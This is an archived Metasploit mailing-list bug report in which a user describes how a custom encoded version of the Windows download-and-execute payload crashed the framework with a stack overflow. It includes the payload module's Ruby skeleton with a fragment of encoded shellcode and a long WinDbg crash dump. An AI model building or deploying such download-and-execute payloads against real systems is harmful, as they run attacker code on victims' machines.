Metasploit mailing list archives
Trying to create my own payload resulted in stack overflow
From: herzel levy <herzelevy () gmail com>
Date: Thu, 2 Dec 2010 21:55:18 +0200
Hi,
I'm not experienced with developing to the framework or reporting bugs and I
hope I'm doing it the right way.
I was trying to create an encoded version of the Download_Exec.rb payload
using the shikata ga nai and the alpha upper encoders which resulted in a
very big payload. I put my payload at
'msf3\modules\payloads\singles\windows' and started Metasploit.
Metasploit then crashed with a stack overflow error. I attached the crash
dump and the payload I created.
Metasploit version: 3.5.1-dev.11003
Environment: Win7 x86
*The payload looks somthing like that:*
require 'msf/core'
require 'msf/core/payload/windows/exec'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Executable Download and Execute',
'Version' => '$Revision: 9488 $',
'Description' => 'Download an EXE from an HTTP URL and execute it',
'Author' => [ 'lion[at]cnhonker.com', 'pita[at]mail.com' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Payload' =>
{
'Offsets' => { },
'Payload' =>
"\xb8\xf3\x11\x7c\xdb\x29\xc9\x66\xb9\x30\x3c\xdb\xd4\xd9" +
"\x74\x24\xf4\x5f\x31\x47\x11\x03\x47\x11\x83\xef\xfc\xe2" +
"\x06\x20\xb5\x65\x99\xa8\x39\x7d\x3f\x96\xeb\xbd\x66\x2a" +
"\x32\xc9\xbc\x5f\x9a\x03\xcb\x8f\x26\x13\x23\x33\xc7\x27" +
"\xd0\x2d\xbe\xfe\x3d\x9a\x2c\xd3\xa5\xc8\x38\x26\xab\x48" +
"\x00\xad\xbb\x53\xea\xf5\x5e\x10\xd0\xae\xe3\x39\xa2\xfa" +
........................................ (1670 lines more like these...)
}
))
# EXITFUNC is not supported :/
deregister_options('EXITFUNC')
# Register command execution options
register_options(
[
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
], self.class)
end
#
# Constructs the payload
#
def generate_stage
return module_info['Payload']['Payload']
end
end
*WinDbg crash dump:*
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is:
SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 0046c000 C:\framework\ruby\bin\ruby.exe
ModLoad: 77920000 77a5c000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 76930000 76a04000 C:\Windows\system32\kernel32.dll
ModLoad: 75b40000 75b8a000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 62d00000 62f23000 C:\framework\ruby\bin\msvcrt-ruby191.dll
ModLoad: 76400000 764a0000 C:\Windows\system32\ADVAPI32.DLL
ModLoad: 76260000 7630c000 C:\Windows\system32\msvcrt.dll
ModLoad: 77660000 77679000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76720000 767c1000 C:\Windows\system32\RPCRT4.dll
ModLoad: 765a0000 765ca000 C:\Windows\system32\IMAGEHLP.DLL
ModLoad: 76a10000 77659000 C:\Windows\system32\SHELL32.DLL
ModLoad: 75f30000 75f87000 C:\Windows\system32\SHLWAPI.dll
ModLoad: 77a70000 77abe000 C:\Windows\system32\GDI32.dll
ModLoad: 764b0000 76579000 C:\Windows\system32\USER32.dll
ModLoad: 77a60000 77a6a000 C:\Windows\system32\LPK.dll
ModLoad: 76360000 763fd000 C:\Windows\system32\USP10.dll
ModLoad: 76220000 76255000 C:\Windows\system32\WS2_32.DLL
ModLoad: 75d70000 75d76000 C:\Windows\system32\NSI.dll
ModLoad: 76580000 7659f000 C:\Windows\system32\IMM32.DLL
ModLoad: 75de0000 75eac000 C:\Windows\system32\MSCTF.dll
ModLoad: 10000000 1003c000 C:\framework\tools\ConsoleHook.dll
ModLoad: 752d0000 752e6000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 750a0000 750db000 C:\Windows\system32\rsaenh.dll
ModLoad: 757b0000 757bc000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 71280000 71288000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\encdb.so
ModLoad: 6ac40000 6ac47000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\iso_8859_8.so
ModLoad: 6dd40000 6dd48000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\transdb.so
ModLoad: 65480000 65487000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16le.so
ModLoad: 6d400000 6d408000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\utf_16_32.so
ModLoad: 628c0000 628db000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\single_byte.so
ModLoad: 69800000 69807000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\md5.so
ModLoad: 6c640000 6c76b000 C:\framework\ruby\bin\libeay32-0.9.8-msvcrt.dll
ModLoad: 75870000 75877000 C:\Windows\system32\WSOCK32.DLL
ModLoad: 68000000 68009000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest.so
ModLoad: 65080000 6508b000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\stringio.so
ModLoad: 61c80000 61c90000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\iconv.so
ModLoad: 68080000 68174000 C:\framework\ruby\bin\libiconv2.dll
ModLoad: 6a400000 6a423000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\zlib.so
ModLoad: 6c280000 6c29a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\dl.so
ModLoad: 65000000 65007000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\etc.so
ModLoad: 767d0000 7692c000 C:\Windows\system32\ole32.dll
ModLoad: 74570000 745b0000 C:\Windows\system32\uxtheme.dll
ModLoad: 74740000 748de000
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
ModLoad: 77ac0000 77b4f000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 77780000 7791d000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 75af0000 75b17000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 75b20000 75b32000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 76190000 76213000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 745d0000 746c5000 C:\Windows\system32\propsys.dll
ModLoad: 743b0000 743d1000 C:\Windows\system32\ntmarta.dll
ModLoad: 76310000 76355000 C:\Windows\system32\WLDAP32.dll
ModLoad: 69980000 69987000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\continuation.so
ModLoad: 6e600000 6e624000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\socket.so
ModLoad: 6a1c0000 6a1c7000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\fcntl.so
ModLoad: 671c0000 6720a000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\openssl.so
ModLoad: 6b380000 6b3c0000 C:\framework\ruby\bin\ssleay32-0.9.8-msvcrt.dll
ModLoad: 00770000 0078f000 C:\framework\ruby\bin\ZLIB1.dll
ModLoad: 67300000 67307000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\shift_jis.so
ModLoad: 65600000 6560a000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\strscan.so
ModLoad: 6ce00000 6ce2a000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\syck.so
ModLoad: 75970000 7597b000 C:\Windows\system32\profapi.dll
ModLoad: 652c0000 652c7000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\sha1.so
ModLoad: 64800000 64807000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\euc_jp.so
ModLoad: 75760000 757ab000 C:\Windows\system32\apphelp.dll
ModLoad: 6a640000 6a658000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\bigdecimal.so
ModLoad: 6fac0000 6fac9000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\parser.so
ModLoad: 70f40000 70f47000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16be.so
ModLoad: 6ffc0000 6ffc7000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32be.so
ModLoad: 6d100000 6d107000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32le.so
ModLoad: 6adc0000 6adcd000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\generator.so
ModLoad: 70380000 704a1000
C:\framework\ruby\lib\ruby\gems\1.9.1\gems\pg-0.9.0-x86-mingw32\lib\1.9\pg_ext.so
ModLoad: 755c0000 755c8000 C:\Windows\system32\SECUR32.dll
ModLoad: 75740000 7575a000 C:\Windows\system32\SSPICLI.DLL
ModLoad: 75290000 752cc000 C:\Windows\system32\mswsock.dll
ModLoad: 74df0000 74df5000 C:\Windows\System32\wshtcpip.dll
ModLoad: 61b80000 61bbb000
C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\nkf.so
(c54.1180): Stack overflow - code c00000fd (!!! second chance !!!)
eax=067c1298 ebx=0000002b ecx=065ac890 edx=000331a0 esi=00000022 edi=00000000
eip=62e3eafd esp=00032ee0 ebp=00033398 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\framework\ruby\bin\msvcrt-ruby191.dll -
msvcrt_ruby191!rb_iseq_translate_threaded_code+0x383d:
62e3eafd 89bd2cfcffff mov dword ptr [ebp-3D4h],edi
ss:0023:00032fc4=00000000
Cheers,
Herzel
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Trying to create my own payload resulted in stack overflow herzel levy (Dec 02)